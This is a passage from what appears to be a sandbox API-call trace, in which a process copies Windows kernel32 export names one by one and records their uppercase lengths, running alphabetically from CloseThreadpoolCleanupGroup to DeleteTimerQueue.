lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.796] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.796] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.796] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.796] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.797] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.797] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.797] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.797] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.797] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.797] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.797] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.797] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.797] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.797] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.797] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.797] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.797] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.797] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.797] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.797] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.797] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.797] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.797] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.798] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.798] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.798] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.798] lstrlenA (lpString="COPYFILEA") returned 9 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.798] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.798] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.798] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.798] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.798] lstrlenA (lpString="COPYFILEW") returned 9 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.798] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.798] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.798] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.798] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.798] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.798] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.798] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.798] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.798] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.799] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.799] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.799] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.799] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.799] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.799] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.799] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.799] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.799] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.799] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.799] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.799] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.799] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.799] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.799] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.799] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.799] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.799] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.800] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.800] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.800] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.800] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.800] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.800] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.800] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.800] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.800] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.800] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.800] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.800] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.800] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.800] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.800] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.800] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.800] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.800] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.801] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.801] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.801] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.801] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.801] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.801] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.801] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.801] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.801] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.801] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.802] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.802] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.802] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.802] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.802] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.802] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.802] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.802] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.802] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.802] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.802] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.802] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.802] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.802] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.802] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.802] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.802] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.802] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.803] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.803] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.803] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.803] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.803] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.803] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.803] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.803] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.803] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.803] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.803] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.803] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.803] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.803] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.803] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.803] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.803] lstrlenA (lpString="DELETEATOM") returned 10 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.803] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.803] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.804] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.804] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.804] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.804] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.804] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.804] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") 